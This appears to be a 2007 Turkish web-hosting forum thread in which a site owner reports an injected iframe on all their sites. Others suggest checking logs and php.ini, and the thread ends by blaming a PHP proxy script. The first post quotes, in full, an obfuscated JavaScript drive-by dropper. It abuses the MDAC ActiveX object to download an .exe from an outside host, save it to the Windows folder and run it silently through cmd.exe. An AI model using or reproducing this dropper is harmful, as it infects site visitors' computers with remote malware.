• 08-05-2007, 18:49:12
    #1
    Kimlik doğrulama veya yönetimden onay bekliyor.


    az önce makinem 100mbiti vurdu
    ne oldu bilmiyorum birden sonradan kesildi problemim

    tüm sitelerimin en üstünde bir iframe açıldı
    *********************
    adresine iframe açılıyor
    iframede açılan sayfada şu kodlar var

    Alıntı
    Rar!
    <noscript>
    <iframe src=*></iframe>
    </noscript>
    <script>
    function Chinahks(fan){var nb = Math.random()*fan;return Math.round(nb)+'.exe';
    }try{Zhan='http://www.omwoool.com/1.exe';
    var Lang=document.createElement("object");
    Lang.setAttribute("classid","clsid"+":BD96C556"+"-"+"65A3-11D0-983A"+"-"+"00C04FC29E36");
    var china=Lang.CreateObject("Microsoft"+"."+"X"+"M"+"L "+"H"+"T"+"T"+"P","");
    var ChenZi=Lang.CreateObject("Ad"+"odb.Stream","");
    ChenZi.type=1;
    china.open("GET", Zhan,0);
    china.send();
    var O0=Lang.CreateObject("Script"+"ing.FileSyst"+"emOb ject","");
    var love=O0.GetSpecialFolder(0);
    var osur;
    QQ7999327=Chinahks(1000);
    osur=O0.BuildPath(love,"rising"+QQ7999327);
    QQ7999327= O0.BuildPath(love,QQ7999327);
    ChenZi.Open();
    ChenZi.Write(china.responseBody);
    ChenZi.SaveToFile(QQ7999327,2);
    ChenZi.Close();
    O0.MoveFile(QQ7999327,osur);
    var QQ=Lang.CreateObject("She"+"ll.Appli"+"cation","") ;
    meinv=O0.BuildPath(love+'\\system32','cmd.exe');
    QQ.ShellExecute(meinv,' /c '+osur,"","open",0);
    }catch(z){z=1;}
    </script>
    <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
    yeni server sipariş etmeyi bile düşünüyorum
    serverımdan dışarı birşeyler çıkıyor sürekli
  • 08-05-2007, 19:04:49
    #2


    çok ucuz sunucularım var
  • 08-05-2007, 19:05:45
    #3
    Üyeliği durduruldu


    bu neden olmuş olabilirmi loglara bakarsan anlaşılır aslında.
    kullanılan bu proxy scriptinden olmasın?
    Sadece tahmin benimkisi
  • 08-05-2007, 19:41:26
    #4
    bildiğimiz php proxy
    ne sorun çıkarabilirki
  • 09-05-2007, 06:39:37
    #5
    Kurumsal PLUS
    cacti verisi zoom yapabilirsin iyice zoom yap tam tarihi gör sonra

    nano /var/log/message

    de o zaman aralıklarına bir bak sistem kaynaklı birşey varmı diye..

    sonra da şüpe duydugun sitelerin apache loglarına bak

    loglardan bulursun bunu
  • 09-05-2007, 22:59:14
    #6
    aynısı banada oldu.

    bu adresten iframe atıldı sayfalara,

    bilgisi olan varmı başka ? nasıl çözeriz ne yaparız
  • 09-05-2007, 23:18:53
    #7
    Üyeliği durduruldu
    Bunla alakası varmı acaba Dropby yazmışsa bildiği bişey vardır muhakkak
    dropby23 adlı üyeden alıntı: mesajı görüntüle
    php.ini dosyasını aç zend yüklüyse
    nano -w /usr/local/Zend/etc/php.ini altında
    değilse nano -w /usr/local/lib/php.ini altında
    ctrl +w ye bas enable_dl olarak arat çıkan satırdaki yes i no yap ctrl +x e basıp kaydedip çık ve service httpd restart yazarak apache yi yeniden başlat bakalım olucakmı gene
  • 09-05-2007, 23:28:52
    #8
    zend yok kullanmıyorum
    o proxydenmiş netlojik
    o site üzerinden proxy olarak googleda indexlenmiş 50000 sayfa vardı
    o kadar ağırlaştırıyormuşki
    sorun ondanmıs
  • 09-05-2007, 23:31:46
    #9
    Misafir
    linki açık vermeseydin keşke